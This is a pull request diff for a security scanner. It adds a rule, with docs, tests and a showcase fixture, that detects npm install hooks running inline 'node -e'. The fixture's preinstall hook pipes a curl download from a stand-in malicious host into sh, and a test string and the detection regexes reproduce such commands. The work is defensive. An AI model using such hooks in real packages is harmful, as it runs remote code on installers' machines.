### PR TITLE
chore(rules): add malware pattern updates 2026-02-18

### DIFF
--- a/PATTERN_UPDATES.md
+++ b/PATTERN_UPDATES.md
@@ -1,5 +1,29 @@
 # Pattern Updates - February 2026
 
+## 2026-02-18 (2): npm Lifecycle Inline Node Eval Pattern
+
+**Sources:**
+- [The Hacker News - Compromised dYdX npm and PyPI Packages Deliver Wallet Stealers and RAT Malware](https://thehackernews.com/2026/02/compromised-dydx-npm-and-pypi-packages.html)
+- [The Hacker News - npm’s Update to Harden Their Supply Chain, and Points to Consider](https://thehackernews.com/2026/02/npms-update-to-harden-their-supply.html)
+
+**Event Summary:** Recent npm supply-chain reporting continues to show malicious execution paths tied to install-time behavior. While prior rules covered shell bootstrap primitives in lifecycle hooks, attacker playbooks also rely on inline JavaScript execution during `preinstall`/`postinstall` to launch child processes and run second-stage payloads.
+
+**New Pattern Added:**
+
+### SUP-005: npm preinstall/postinstall inline Node eval pattern
+- **Category:** malware_pattern
+- **Severity:** high
+- **Confidence:** 0.86
+- **Pattern:** Detects `package.json` lifecycle script values where `preinstall` or `postinstall` runs `node -e` or `node --eval` inline.
+- **Justification:** Inline eval in install hooks is an execution primitive frequently used in supply-chain malware to hide process-spawn/download behavior without checked-in script files.
+- **Mitigation:** Remove inline eval from install hooks and use reviewed version-controlled scripts with explicit file paths.
+
+**Version:** Rules updated from 2026.02.18.1 to 2026.02.18.2
+
+**Testing:** Added coverage in `tests/test_rules.py::test_new_patterns_2026_02_18`, showcase validation in `tests/test_showcase_examples.py`, and fixture `examples/showcase/37_npm_lifecycle_node_eval`.
+
+---
+
 ## 2026-02-18 (1): IPv4-Mapped IPv6 SSRF Bypass Literals
 
 **Sources:**

--- a/docs/EXAMPLES.md
+++ b/docs/EXAMPLES.md
@@ -41,6 +41,7 @@ SkillScan ships a full showcase in `examples/showcase` to demonstrate detection 
 | `34_pr_target_checkout_exfil` | `pull_request_target` workflow that checks out untrusted PR head refs (`head.ref`/`head.sha`) | `EXF-005`, `CHN-005` |
 | `35_discord_debugger_token_theft` | Discord Electron `webContents.debugger` hook intercepting auth/MFA network traffic (`/login`, `/mfa`, `codes-verification`) | `MAL-008` |
 | `36_ipv4_mapped_ipv6_ssrf_bypass` | IPv4-mapped IPv6 loopback/metadata endpoint literals that can bypass naive SSRF filters | `EXF-006` |
+| `37_npm_lifecycle_node_eval` | npm `preinstall`/`postinstall` inline `node -e` / `node --eval` execution in lifecycle hooks | `SUP-005` |
 
 ## Commands
 

--- a/docs/RULE_UPDATES.md
+++ b/docs/RULE_UPDATES.md
@@ -1,5 +1,15 @@
 # Rule Updates
 
+## 2026-02-18
+
+- Added `SUP-005` (high): **npm preinstall/postinstall inline Node eval pattern**.
+- Rationale: recent npm supply-chain incident reporting continues to show install-time execution abuse, and lifecycle scripts using `node -e` / `node --eval` provide a compact way to hide malicious child-process execution without committed script files.
+- This rule is scoped only to `preinstall`/`postinstall` keys to keep false positives lower than generic `node -e` matching.
+
+Sources:
+- The Hacker News (2026-02), *Compromised dYdX npm and PyPI Packages Deliver Wallet Stealers and RAT Malware*: https://thehackernews.com/2026/02/compromised-dydx-npm-and-pypi-packages.html
+- The Hacker News (2026-02), *npm’s Update to Harden Their Supply Chain, and Points to Consider*: https://thehackernews.com/2026/02/npms-update-to-harden-their-supply.html
+
 ## 2026-02-11
 
 - Added `MAL-006` (high): **PowerShell web request piped to Invoke-Expression**.

--- a/examples/showcase/37_npm_lifecycle_node_eval/package.json
+++ b/examples/showcase/37_npm_lifecycle_node_eval/package.json
@@ -1,0 +1,9 @@
+{
+  "name": "showcase-node-eval-lifecycle",
+  "version": "1.0.0",
+  "private": true,
+  "scripts": {
+    "preinstall": "node -e \"require('child_process').execSync('curl -fsSL https://malicious.example/bootstrap.sh | sh', { stdio: 'ignore' })\"",
+    "test": "echo \"ok\""
+  }
+}

--- a/examples/showcase/INDEX.md
+++ b/examples/showcase/INDEX.md
@@ -38,6 +38,7 @@ Each folder demonstrates one major detection or behavior.
 34. `34_pr_target_checkout_exfil`: `pull_request_target` workflow checking out untrusted PR head refs (`EXF-005`, `CHN-005`)
 35. `35_discord_debugger_token_theft`: Discord Electron debugger network interception markers used for credential/token theft (`MAL-008`)
 36. `36_ipv4_mapped_ipv6_ssrf_bypass`: IPv4-mapped IPv6 loopback/metadata literals used for SSRF guard bypass attempts (`EXF-006`)
+37. `37_npm_lifecycle_node_eval`: npm install lifecycle inline `node -e/--eval` execution pattern seen in supply-chain malware (`SUP-005`)
 
 ## Run examples
 

--- a/src/skillscan/data/rules/default.yaml
+++ b/src/skillscan/data/rules/default.yaml
@@ -1,4 +1,4 @@
-version: "2026.02.18.1"
+version: "2026.02.18.2"
 
 static_rules:
   - id: MAL-001
@@ -160,6 +160,14 @@ static_rules:
     title: npm preinstall/postinstall shell bootstrap pattern
     pattern: '(?i)"(?:preinstall|postinstall)"\s*:\s*"[^"\n]{0,300}(?:curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod|powershell(?:\.exe)?|cmd(?:\.exe)?\s*/c|bash\s+-c|sh\s+-c)[^"\n]*"'
     mitigation: Remove shell/bootstrap execution from npm preinstall/postinstall hooks. Use explicit reviewed setup steps outside lifecycle scripts.
+
+  - id: SUP-005
+    category: malware_pattern
+    severity: high
+    confidence: 0.86
+    title: npm preinstall/postinstall inline Node eval pattern
+    pattern: '(?i)"(?:preinstall|postinstall)"\s*:\s*"[^"\n]{0,260}\bnode\s+(?:--eval|-e)\b[^"\n]*"'
+    mitigation: Remove inline `node -e/--eval` execution from npm install lifecycle hooks. Use reviewed version-controlled scripts with explicit file paths.
 
   - id: MAL-007
     category: malware_pattern

--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -194,7 +194,7 @@ def test_new_patterns_2026_02_13_patch2() -> None:
 
 
 def test_new_patterns_2026_02_18() -> None:
-    """Test IPv4-mapped IPv6 SSRF bypass literal markers."""
+    """Test IPv4-mapped IPv6 SSRF bypass and npm lifecycle node-eval markers."""
     compiled = load_compiled_builtin_rulepack()
 
     exf006 = next((r for r in compiled.static_rules if r.id == "EXF-006"), None)
@@ -202,3 +202,14 @@ def test_new_patterns_2026_02_18() -> None:
     assert exf006.pattern.search("http://0:0:0:0:0:ffff:7f00:1:8080/") is not None
     assert exf006.pattern.search("http://[::ffff:127.0.0.1]/") is not None
     assert exf006.pattern.search("http://[::1]/") is None
+
+    sup005 = next((r for r in compiled.static_rules if r.id == "SUP-005"), None)
+    assert sup005 is not None
+    assert (
+        sup005.pattern.search(
+            '"preinstall": "node -e \"require(\\\'child_process\\\').execSync(\\\'curl -fsSL https://e.example/p.sh|sh\\\')\""'
+        )
+        is not None
+    )
+    assert sup005.pattern.search('"postinstall": "node --eval \"process.exit(0)\""') is not None
+    assert sup005.pattern.search('"prepare": "node -e \"console.log(1)\""') is None

--- a/tests/test_showcase_examples.py
+++ b/tests/test_showcase_examples.py
@@ -47,6 +47,7 @@ def test_showcase_detection_rules() -> None:
     assert any(
         f.id == "EXF-006" for f in _scan("examples/showcase/36_ipv4_mapped_ipv6_ssrf_bypass").findings
     )
+    assert any(f.id == "SUP-005" for f in _scan("examples/showcase/37_npm_lifecycle_node_eval").findings)
 
 
 def test_showcase_policy_block_domain() -> None:


### PR DESCRIPTION
## Summary
- add SUP-005 for npm preinstall/postinstall inline node -e/--eval execution patterns
- bump rules version to 2026.02.18.2
- add showcase fixture examples/showcase/37_npm_lifecycle_node_eval and update showcase/docs indexes
- add rule update notes in PATTERN_UPDATES.md and docs/RULE_UPDATES.md

## Validation
- `.venv/bin/pytest -q`
- `.venv/bin/ruff check src tests`

## Sources
- https://thehackernews.com/2026/02/compromised-dydx-npm-and-pypi-packages.html
- https://thehackernews.com/2026/02/npms-update-to-harden-their-supply.html
